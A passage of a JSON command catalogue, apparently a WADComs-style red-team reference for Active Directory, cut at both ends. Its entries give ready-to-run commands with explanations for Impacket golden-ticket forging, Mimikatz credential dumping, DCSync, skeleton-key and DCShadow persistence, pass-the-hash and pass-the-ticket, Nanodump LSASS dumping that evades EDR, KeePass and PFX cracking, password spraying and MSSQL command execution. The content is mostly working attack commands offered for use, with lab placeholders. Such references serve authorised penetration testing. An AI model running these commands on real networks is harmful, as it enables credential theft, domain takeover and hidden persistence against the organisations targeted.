reuse it from an Impacket workflow (or vice versa). It performs no network activity.\n\nCommand Reference:\n\n\tInput ticket: ticket.kirbi\n\n\tOutput ticket: out.ccache","mitre":[],"requires":["TGT"],"services":["Kerberos"],"references":["https://github.com/fortra/impacket","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"added":true},{"id":"wadcoms:Impacket-Ticketer-AES","toolId":"wadcoms:Impacket-ticketer","toolName":"Impacket-ticketer","name":"Impacket-Ticketer-AES","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Persistence","Execution"],"nativeCategory":["Persistence","Exploitation"],"command":"# Forge an AES golden ticket -> administrator.ccache\nticketer.py -aesKey 5db474e563f34e4bb62e04eecd4a6f92 -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain test.local administrator\n\n# Use it\nexport KRB5CCNAME=administrator.ccache","description":"Impacket ticketer.py forges golden (or silver) tickets offline; supplying -aesKey signs the ticket with the krbtgt AES256 key instead of the RC4/NT hash, producing an AES-encrypted TGT that blends in with modern Kerberos traffic. The resulting .ccache can be exported to KRB5CCNAME and used by any Impacket tool for pass-the-ticket. Requires the krbtgt AES key and the domain SID.\n\nCommand Reference:\n\n\tAES256 key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775\n\n\tDomain: test.local\n\n\tTarget user: administrator","mitre":["T1558.001"],"requires":["AES_Key"],"services":["Kerberos"],"references":["https://github.com/fortra/impacket","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket","https://attack.mitre.org/techniques/T1558/001/"],"added":true},{"id":"wadcoms:John-keepass2john","toolId":"wadcoms:John","toolName":"John","name":"John-keepass2john","source":"DAEMON","platform":["Linux"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# extract the master-key hash from the .kdbx\nkeepass2john Database.kdbx > hashes.txt\n\n# crack the master password\njohn --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt\n\njohn --show hashes.txt","description":"KeePass databases (.kdbx) looted from a share or a compromised host are frequent sources of privileged credentials. John the Ripper's keepass2john helper converts the database master-key parameters into a crackable hash, which john then attacks with a wordlist. It handles both password-only and keyfile-protected databases (pass the keyfile with -k). Fully offline; a recovered master password opens every secret in the vault.\n\nCommand Reference:\n\n\tKeePass DB: Database.kdbx\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1555.005"],"requires":["No_Creds"],"references":["https://github.com/openwall/john","https://hashcat.net/wiki/doku.php?id=example_hashes","https://attack.mitre.org/techniques/T1555/005/"],"added":true},{"id":"wadcoms:John-pfx2john","toolId":"wadcoms:John","toolName":"John","name":"John-pfx2john","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"# extract the crackable hash from the .pfx\npfx2john cert.pfx > hashes.txt\n\n# crack the passphrase (john auto-detects the pfx format)\njohn --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt\n\njohn --show hashes.txt","description":"A password-protected PKCS#12 certificate store (.pfx / .p12) recovered during collection can be opened offline. John the Ripper's pfx2john helper extracts the encryption parameters into a crackable hash, which john then brute-forces against a wordlist. Recovering the passphrase unlocks the private key and certificate, which can be used for PKINIT/Schannel authentication (e.g. via certipy or Rubeus). Runs entirely offline with no target interaction.\n\nCommand Reference:\n\n\tPFX File: cert.pfx\n\n\tHash File: hashes.txt\n\n\tWordlist: /usr/share/wordlists/rockyou.txt","mitre":["T1110.002"],"requires":["No_Creds"],"services":["ADCS"],"references":["https://github.com/openwall/john","https://www.thehacker.recipes/ad/movement/kerberos/pass-the-certificate","https://attack.mitre.org/techniques/T1110/002/"],"added":true},{"id":"wadcoms:JuicyPotatoNG-SeImpersonate","toolId":"wadcoms:JuicyPotatoNG","toolName":"JuicyPotatoNG","name":"JuicyPotatoNG-SeImpersonate","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# -t * tries both token-creation APIs, -l sets the local COM server port\nJuicyPotatoNG.exe -t * -p \"C:\\Windows\\System32\\cmd.exe\" -a \"/c whoami\" -l 9999","description":"JuicyPotatoNG revives the JuicyPotato DCOM abuse against modern Windows by using a specific CLSID and a local COM server on a non-default port to coerce a SYSTEM authentication, then impersonates the token. The -t flag selects the token API: 't' uses CreateProcessWithTokenW (needs SeImpersonatePrivilege), 'u' uses CreateProcessAsUserW (needs SeAssignPrimaryTokenPrivilege), and '*' tries both. It works on Windows 10 / Server 2019 and later where classic JuicyPotato was blocked. Requires SeImpersonate or SeAssignPrimaryToken on the service account.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege\n\n\tCOM listen port: 9999","mitre":[],"requires":["Shell"],"services":["DCOM"],"references":["https://github.com/antonioCoco/JuicyPotatoNG","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato"],"added":true},{"id":"wadcoms:Krbrelayx-Unconstrained-TGT","toolId":"wadcoms:Krbrelayx","toolName":"Krbrelayx","name":"Krbrelayx-Unconstrained-TGT","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Privilege Escalation","Execution"],"nativeCategory":["Credential Access","PrivEsc","Exploitation"],"command":"# Export mode: capture forwarded TGTs using the unconstrained account's key\npython3 krbrelayx.py -aesKey 5db474e563f34e4bb62e04eecd4a6f92\n# Then coerce dc.test.local to authenticate (PetitPotam/printerbug) to drop a TGT ccache","description":"krbrelayx.py by dirkjanm abuses Kerberos unconstrained delegation. When you control an account or computer configured with unconstrained delegation, any principal that authenticates to it via Kerberos forwards a usable TGT inside the ticket. Running krbrelayx.py with the account's key (AES key or NT hash) and no relay target puts it in export mode: it starts an SMB/HTTP listener, decrypts incoming Kerberos service tickets, and writes the embedded TGTs to ccache files on disk. Coercing a Domain Controller (via PetitPotam or the printer bug) to authenticate yields the DC's TGT, which can then be used with secretsdump.py for a full DCSync. This is the Kerberos analogue to NTLM relaying and bypasses SMB signing.\n\nCommand Reference:\n\n\tDelegation account AES256 key: 5db474e563f34e4bb62e04eecd4a6f92\n\n\tDomain Controller IP: 10.10.10.1\n\n\tOutput ccache: out.ccache","mitre":[],"requires":["AES_Key"],"services":["Kerberos"],"references":["https://github.com/dirkjanm/krbrelayx","https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/","https://www.thehacker.recipes/ad/movement/kerberos/delegations/unconstrained"],"added":true},{"id":"wadcoms:LaZagne-All","toolId":"wadcoms:LaZagne","toolName":"LaZagne","name":"LaZagne-All","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"laZagne.exe all","description":"LaZagne is an open-source credential harvester that walks dozens of local software modules - browsers, mail clients, Wi-Fi, LSA secrets, credential vaults, chats, databases, and more - and recovers stored passwords in one pass. The 'all' argument runs every module; results can be written to file with -oN (json), -oA (all formats), or -oJ. Some modules (LSA secrets, Wi-Fi) need administrator rights while browser and app creds are readable in the user's own context, making it a fast triage tool after initial access.\n\nCommand Reference:\n\n\tTarget host: local (current user context)","mitre":["T1555"],"requires":["Shell"],"services":["NTLM"],"references":["https://github.com/AlessandroZ/LaZagne","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1555/"],"added":true},{"id":"wadcoms:ldapdomaindump-Enum","toolId":"wadcoms:ldapdomaindump","toolName":"ldapdomaindump","name":"ldapdomaindump-Enum","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Dump all domain objects (users, groups, computers, policy, trusts) to HTML/JSON/greppable files\nldapdomaindump -u 'test.local\\john' -p password123 -o output_dir ldap://10.10.10.1","description":"ldapdomaindump (dirkjanm) authenticates to a Domain Controller over LDAP/LDAPS with any valid domain account and dumps the whole directory - users, groups, computers, domain policy, and trusts - into ready-to-read HTML tables plus machine-parsable JSON and greppable text. It is a fast first-pass inventory when you land your first set of credentials and want an offline overview of the domain before running heavier tooling. Output lands in the directory given with -o (default: current dir).\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tDomain: test.local\n\tTarget DC IP: 10.10.10.1","mitre":["T1087.002"],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/dirkjanm/ldapdomaindump","https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap","https://attack.mitre.org/techniques/T1087/002/"],"added":true},{"id":"wadcoms:ldapnomnom-UserEnum","toolId":"wadcoms:ldapnomnom","toolName":"ldapnomnom","name":"ldapnomnom-UserEnum","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Anonymous, lockout-free username validation via cLDAP LDAP Ping; DCs auto-discovered from DNS\nldapnomnom --input usernames.txt --output output.txt --dnsdomain test.local","description":"ldapnomnom (lkarlslund) anonymously bruteforces valid Active Directory usernames at very high speed by abusing cLDAP LDAP Ping (Netlogon) requests against Domain Controllers. Because a valid name produces a different response than an invalid one, existence can be confirmed without authenticating - so there are no failed logons and no account lockouts, making it far quieter than Kerberos pre-auth enumeration. Feed it a wordlist with --input and it writes the valid names to --output; --dnsdomain lets it auto-discover DCs via DNS. Ideal for pre-credential recon.\n\nCommand Reference:\n\n\tNo_Creds\n\tUsername wordlist: usernames.txt\n\tOutput file: output.txt\n\tDomain: test.local","mitre":["T1087.002"],"requires":["No_Creds"],"services":["LDAP","Kerberos"],"references":["https://github.com/lkarlslund/ldapnomnom","https://attack.mitre.org/techniques/T1087/002/"],"added":true},{"id":"wadcoms:ldeep-Enum-All","toolId":"wadcoms:ldeep","toolName":"ldeep","name":"ldeep-Enum-All","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Collect everything into files prefixed 'output' (output_users.json, output_groups.json, ...)\nldeep ldap -u john -p password123 -d test.local -s ldap://10.10.10.1 all output","description":"ldeep is an in-depth LDAP enumeration utility that ships dozens of focused subcommands (users, groups, memberships, trusts, GPOs, delegation, PSOs, and more) under its ldap mode. The all subcommand collects computers, domain_policy, zones, gpo, groups, ou, users, trusts and pso in one pass and writes each to files prefixed with the base name you supply. Run it with any valid domain account when you want a complete, structured snapshot of the directory to grep offline. Individual subcommands (e.g. ldeep ldap ... trusts) can be run afterward for targeted queries.\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tDomain: test.local\n\tTarget DC IP: 10.10.10.1","mitre":["T1087.002"],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/franc-pentest/ldeep","https://www.hackingarticles.in/active-directory-enumeration-ldeep/","https://attack.mitre.org/techniques/T1087/002/"],"added":true},{"id":"wadcoms:MANSPIDER-Content-Search","toolId":"wadcoms:MANSPIDER","toolName":"MANSPIDER","name":"MANSPIDER-Content-Search","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Collection","Credential Access","Discovery"],"nativeCategory":["Collection","Credential Access","Discovery"],"command":"# Search file CONTENT for 'password' across all readable shares on a host\nmanspider 10.10.10.1 -c password -u john -p password123 -d test.local\n\n# Hunt spreadsheets/office docs mentioning credentials, content-only (no download)\nmanspider 10.10.10.1 -c passw creds -e xlsx docx csv -n -u john -p password123 -d test.local","description":"MANSPIDER (Black Lantern Security) crawls readable SMB shares across one or many hosts and greps inside the files it finds, so it catches secrets buried in documents, spreadsheets and text files rather than just interesting filenames. -c/--content takes one or more regexes matched against extracted file contents (it can parse PDF, Office and other formats), while -f/--filenames and -e/--extensions narrow the crawl by name or type. It downloads matching files to the loot directory by default; add -n/--no-download for a quieter content-only sweep. Useful for wide domain-scale secret hunting once you hold any domain account.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/blacklanternsecurity/MANSPIDER","https://www.blacklanternsecurity.com/2020-11-04-MANSPIDER/"],"added":true},{"id":"wadcoms:Mimikatz-Crypto-ExportCerts","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-Crypto-ExportCerts","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"mimikatz.exe \"crypto::capi\" \"privilege::debug\" \"crypto::cng\" \"crypto::certificates /systemstore:LOCAL_MACHINE /store:My /export\" exit","description":"Mimikatz crypto::certificates lists and, with /export, extracts certificates and their private keys from a CryptoAPI store to .pfx/.der files, even when the private key was marked non-exportable. crypto::capi (and crypto::cng for CNG keys) patches the key-provider in memory first so the non-exportable flag is bypassed. Point /systemstore at LOCAL_MACHINE for machine certs or CURRENT_USER for user certs; exported .pfx files enable certificate-based (PKINIT) authentication as that principal.\n\nCommand Reference:\n\n\tStore: LOCAL_MACHINE\\My\n\n\tExport password: mimikatz (default for exported .pfx)","mitre":["T1552.004"],"requires":["Shell"],"services":["ADCS"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates","https://attack.mitre.org/techniques/T1552/004/"],"added":true},{"id":"wadcoms:Mimikatz-DCShadow","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-DCShadow","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Persistence","Defense Evasion"],"nativeCategory":["Persistence","Defense Evasion"],"command":"# Instance 1 (SYSTEM) - stage the change\nmimikatz.exe \"!+\" \"!processtoken\" \"lsadump::dcshadow /object:john /attribute:primaryGroupID /value:512\"\n\n# Instance 2 (Domain Admin) - push the replication\nmimikatz.exe \"lsadump::dcshadow /push\" exit","description":"Mimikatz lsadump::dcshadow temporarily registers a rogue domain controller and pushes attacker-chosen attribute changes into the directory through legitimate replication (MS-DRSR), which sidesteps normal object-modification auditing. It runs as two cooperating instances: an elevated SYSTEM instance stages the change with /object, /attribute and /value, and a second instance holding Domain Admin (or the required replication rights) triggers the push with /push. Use it for stealthy persistence such as writing a primaryGroupID or SIDHistory.\n\nCommand Reference:\n\n\tTarget object: john\n\n\tAttribute: primaryGroupID = 512 (Domain Admins)","mitre":[],"requires":["Shell"],"services":["LDAP","RPC"],"references":["https://github.com/gentilkiwi/mimikatz","https://www.dcshadow.com/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dcshadow"],"added":true},{"id":"wadcoms:Mimikatz-DCSync-Krbtgt","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-DCSync-Krbtgt","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Execution"],"nativeCategory":["Credential Access","Exploitation"],"command":"mimikatz.exe \"privilege::debug\" \"lsadump::dcsync /domain:test.local /user:krbtgt\" exit","description":"Mimikatz lsadump::dcsync impersonates a domain controller and uses the MS-DRSR replication protocol (GetNCChanges) to pull the password data of a chosen account from a live DC, without ever running code on that DC or touching NTDS.dit on disk. Targeting krbtgt yields the KDC key needed to forge Golden Tickets. It requires an account with the Replicating Directory Changes / Replicating Directory Changes All rights (Domain Admins, Enterprise Admins, or a delegated principal).\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tTarget user: krbtgt","mitre":["T1003.006"],"requires":["Shell"],"services":["Kerberos","LDAP"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dcsync","https://attack.mitre.org/techniques/T1003/006/"],"added":true},{"id":"wadcoms:Mimikatz-DPAPI-Masterkey-Cred","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-DPAPI-Masterkey-Cred","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"mimikatz.exe \"dpapi::masterkey /in:\\\"%appdata%\\Microsoft\\Protect\\S-1-5-21-1339291983-1349129144-367733775-1001\\<GUID>\\\" /sid:S-1-5-21-1339291983-1349129144-367733775-1001 /password:password123\" \"dpapi::cred /in:\\\"%appdata%\\Microsoft\\Credentials\\<GUID>\\\"\" exit","description":"Mimikatz dpapi::masterkey decrypts a user's DPAPI master key from the Protect folder using their password (and SID), and dpapi::cred then uses that cached master key to decrypt a Credential blob into its stored plaintext secret. DPAPI protects saved RDP, browser, scheduled-task, and Credential Manager secrets, so this chain recovers them offline from copied files. If you lack the user's password, dpapi::masterkey /rpc asks the domain controller to decrypt the key with the domain DPAPI backup key.\n\nCommand Reference:\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775\n\n\tPassword: password123","mitre":["T1555.004"],"requires":["Shell","Password"],"services":["NTLM"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords","https://attack.mitre.org/techniques/T1555/004/"],"added":true},{"id":"wadcoms:Mimikatz-LogonPasswords","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-LogonPasswords","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"mimikatz.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" exit","description":"Mimikatz sekurlsa::logonpasswords reads the authentication material cached in LSASS memory and reconstructs plaintext passwords, NT/LM hashes, and Kerberos keys for every interactive, service, and network logon session on the host. It requires local administrator rights and SeDebugPrivilege, which privilege::debug enables before touching LSASS. This is the classic loud credential dump; on hardened hosts (Credential Guard, PPL, or EDR hooking LSASS) it will fail or be caught, so prefer an offline minidump plus pypykatz when OPSEC matters.\n\nCommand Reference:\n\n\tTarget host: local\n\n\tPrivilege: SeDebugPrivilege","mitre":["T1003.001"],"requires":["Shell"],"services":["NTLM","Kerberos"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"added":true},{"id":"wadcoms:Mimikatz-LsadumpSAM","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-LsadumpSAM","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"mimikatz.exe \"privilege::debug\" \"token::elevate\" \"lsadump::sam\" exit","description":"Mimikatz lsadump::sam decrypts the local SAM database using the boot key from the SYSTEM hive and dumps the NT hashes of all local accounts, including the local Administrator. Running it live requires SYSTEM-level access, so token::elevate is used to raise from an administrative shell to SYSTEM. The recovered local hashes are ideal for local pass-the-hash and for spotting password reuse across a fleet where the same local admin hash is shared.\n\nCommand Reference:\n\n\tTarget host: local\n\n\tHive source: live registry (SAM + SYSTEM)","mitre":["T1003.002"],"requires":["Shell"],"services":["NTLM"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz","https://attack.mitre.org/techniques/T1003/002/"],"added":true},{"id":"wadcoms:Mimikatz-LsadumpSecrets","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-LsadumpSecrets","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access"],"command":"mimikatz.exe \"privilege::debug\" \"token::elevate\" \"lsadump::secrets\" exit","description":"Mimikatz lsadump::secrets decrypts the LSA secrets stored under the SECURITY registry hive, exposing service account passwords, scheduled-task credentials, cached DPAPI machine keys, auto-logon passwords, and the machine account secret in cleartext. It needs SYSTEM rights, so token::elevate is chained after privilege::debug. LSA secrets frequently hand over a domain service account password that no other technique reveals.\n\nCommand Reference:\n\n\tTarget host: local\n\n\tHive source: live registry (SECURITY + SYSTEM)","mitre":["T1003.004"],"requires":["Shell"],"services":["NTLM"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz","https://attack.mitre.org/techniques/T1003/004/"],"added":true},{"id":"wadcoms:Mimikatz-PassTheHash","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-PassTheHash","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Lateral Movement"],"nativeCategory":["Lateral Movement"],"command":"mimikatz.exe \"privilege::debug\" \"sekurlsa::pth /user:john /domain:test.local /ntlm:2a3de7fe356ee524cc9f3d579f2e0aa7 /run:cmd.exe\" exit","description":"Mimikatz sekurlsa::pth performs pass-the-hash by starting a new process whose logon session is seeded with a supplied NT hash (or AES key), letting network authentication proceed as the target user without knowing their password. The spawned process (here cmd.exe) can then reach SMB, WMI, or WinRM as john. It requires local administrator rights on the box you run it from because it patches the new process's LSASS session; use /aes256 instead of /ntlm for an overpass-the-hash that requests Kerberos tickets.\n\nCommand Reference:\n\n\tUsername: john\n\n\tDomain: test.local\n\n\tNT hash: 2a3de7fe356ee524cc9f3d579f2e0aa7","mitre":["T1550.002"],"requires":["Shell","Hash"],"services":["NTLM","SMB","Kerberos"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/ntlm/pass-the-hash","https://attack.mitre.org/techniques/T1550/002/"],"added":true},{"id":"wadcoms:Mimikatz-PassTheTicket","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-PassTheTicket","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Lateral Movement"],"nativeCategory":["Lateral Movement"],"command":"mimikatz.exe \"kerberos::ptt ticket.kirbi\" exit","description":"Mimikatz kerberos::ptt injects a Kerberos ticket (.kirbi TGT or TGS) directly into the current logon session's ticket cache, so subsequent tools authenticate with it transparently. Unlike sekurlsa::pth it does not spawn a process or need administrator rights, since it only writes to the caller's own cache. Use it to replay a harvested or forged ticket for pass-the-ticket lateral movement, then verify with klist.\n\nCommand Reference:\n\n\tTicket file: ticket.kirbi","mitre":["T1550.003"],"requires":["Shell","TGT"],"services":["Kerberos"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://attack.mitre.org/techniques/T1550/003/"],"added":true},{"id":"wadcoms:Mimikatz-SkeletonKey","toolId":"wadcoms:Mimikatz","toolName":"Mimikatz","name":"Mimikatz-SkeletonKey","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Persistence"],"nativeCategory":["Persistence"],"command":"mimikatz.exe \"privilege::debug\" \"misc::skeleton\" exit","description":"Mimikatz misc::skeleton patches the LSASS process of a live domain controller in memory so that a master password (the hardcoded default 'mimikatz') is accepted for any domain account alongside each user's real password. It is a stealthy but volatile persistence primitive: the patch lives only in memory and is lost on DC reboot, and it downgrades some Kerberos encryption which detections watch for. It requires Domain Admin / SeDebugPrivilege on the DC and only works against DCs not running LSA as a protected process.\n\nCommand Reference:\n\n\tTarget: Domain Controller DC01 (dc.test.local)\n\n\tMaster password: mimikatz (built-in default)","mitre":["T1556.001"],"requires":["Shell"],"services":["Kerberos"],"references":["https://github.com/gentilkiwi/mimikatz","https://adsecurity.org/?p=1275","https://attack.mitre.org/techniques/T1556/001/"],"added":true},{"id":"wadcoms:Nanodump-LSASS","toolId":"wadcoms:Nanodump","toolName":"Nanodump","name":"Nanodump-LSASS","source":"DAEMON","platform":["Windows","ActiveDirectory"],"capability":["Credential Access","Defense Evasion"],"nativeCategory":["Credential Access","Defense Evasion"],"command":"nanodump.x64.exe --fork --valid --write C:\\Windows\\Temp\\lsass.dmp","description":"Nanodump is an OPSEC-aware LSASS dumper that reads process memory and writes a minidump without calling the heavily monitored MiniDumpWriteDump API, avoiding many EDR hooks. --fork clones the LSASS process and dumps the copy to reduce detection, and --valid restores the dump's signature so pypykatz or Mimikatz can parse it (nanodump writes an invalid signature by default to evade disk scanners). It requires local administrator / SeDebugPrivilege; exfil the dump and parse it offline.\n\nCommand Reference:\n\n\tOutput dump: C:\\Windows\\Temp\\lsass.dmp","mitre":["T1003.001"],"requires":["Shell"],"services":["NTLM","Kerberos"],"references":["https://github.com/fortra/nanodump","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"added":true},{"id":"wadcoms:NetExec-LDAP-ADCS","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-LDAP-ADCS","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Enumerate Enterprise CAs and certificate templates over LDAP\nnxc ldap 10.10.10.1 -u john -p password123 -M adcs","description":"The NetExec (nxc) ldap module -M adcs enumerates Active Directory Certificate Services by querying the Configuration partition over LDAP, listing the Enterprise CAs and the certificate templates published in the domain. It is a quick way to confirm AD CS is present and to gather CA and template names before running Certipy to hunt for vulnerable (ESC) configurations. Requires any valid domain account.\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tTarget DC IP: 10.10.10.1","mitre":[],"requires":["Username","Password"],"services":["LDAP","ADCS"],"references":["https://github.com/Pennyw0rth/NetExec","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates","https://posts.specterops.io/certified-pre-owned-d95910965cd2"],"added":true},{"id":"wadcoms:NetExec-LDAP-MAQ","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-LDAP-MAQ","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Enumeration","Discovery"],"nativeCategory":["Enumeration","Discovery"],"command":"# Read ms-DS-MachineAccountQuota (how many computer accounts this user may add)\nnxc ldap 10.10.10.1 -u john -p password123 -M maq\n# Confirm the authenticated identity / domain SID\nnxc ldap 10.10.10.1 -u john -p password123 -M whoami","description":"The NetExec (nxc) ldap module -M maq reads the ms-DS-MachineAccountQuota attribute, revealing how many computer accounts an authenticated user is allowed to create (default 10). A non-zero quota is a prerequisite for attacks that need a controlled computer object, such as Resource-Based Constrained Delegation (RBCD) and Shadow Credentials. The -M whoami module confirms the authenticated context and domain SID. Both need only a valid low-privileged account.\n\nCommand Reference:\n\n\tUsername: john\n\tPassword: password123\n\tTarget DC IP: 10.10.10.1","mitre":["T1087.002"],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/ldap-protocol/enumerate-machineaccountquota","https://attack.mitre.org/techniques/T1087/002/"],"added":true},{"id":"wadcoms:NetExec-MSSQL-CmdExec","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-MSSQL-CmdExec","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution","Lateral Movement"],"nativeCategory":["Exploitation","Lateral Movement"],"command":"# OS command via xp_cmdshell\nnxc mssql 10.10.10.1 -u john -p password123 -x \"whoami /all\"\n\n# PowerShell command\nnxc mssql 10.10.10.1 -u john -p password123 -X \"$PSVersionTable\"","description":"NetExec's mssql -x runs an operating-system command through xp_cmdshell (it will enable the option automatically if the login is sysadmin), returning stdout. Use -X instead to execute a PowerShell command block. Command execution runs as the SQL Server service account and requires sysadmin; enabling xp_cmdshell is a high-signal event.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["MSSQL"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/mssql-protocol/command-execution","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true},{"id":"wadcoms:NetExec-MSSQL-LocalAuth","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-MSSQL-LocalAuth","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Credential Access","Lateral Movement"],"nativeCategory":["Credential Access","Lateral Movement"],"command":"# Local SQL login (e.g. sa) rather than domain auth\nnxc mssql 10.10.10.1 -u sa -p password123 --local-auth\n\n# Spray a local sa password across a subnet\nnxc mssql 10.10.10.0/24 -u sa -p password123 --local-auth","description":"With --local-auth, NetExec authenticates the SQL Server login as a local (mixed-mode) account instead of a domain principal — the classic case being the sa account or a recovered application login. This is useful for password spraying a reused sa password across many hosts, or logging into an instance that is not domain-joined. Combine with -q, -x, or a module once authenticated.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: sa\n\n\tPassword: password123","mitre":[],"requires":["Username","Password"],"services":["MSSQL"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/mssql-protocol/authentication","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"],"added":true},{"id":"wadcoms:NetExec-MSSQL-Priv","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-MSSQL-Priv","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"capability":["Privilege Escalation","Execution"],"nativeCategory":["PrivEsc","Exploitation"],"command":"# Enumerate impersonation / db_owner privesc paths\nnxc mssql 10.10.10.1 -u john -p password123 -M mssql_priv\n\n# Escalate the current login to sysadmin\nnxc mssql 10.10.10.1 -u john -p password123 -M mssql_priv -o ACTION=privesc","description":"The mssql_priv NetExec module enumerates and abuses privilege-escalation paths inside a SQL Server instance — principals the login can impersonate (EXECUTE AS / IMPERSONATE), and db_owner membership on databases owned by a high-privileged principal. Run it with no options to enumerate available paths; run it with ACTION=privesc to walk the chain and grant the current login sysadmin. Add ACTION=rollback to undo the change afterwards.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: 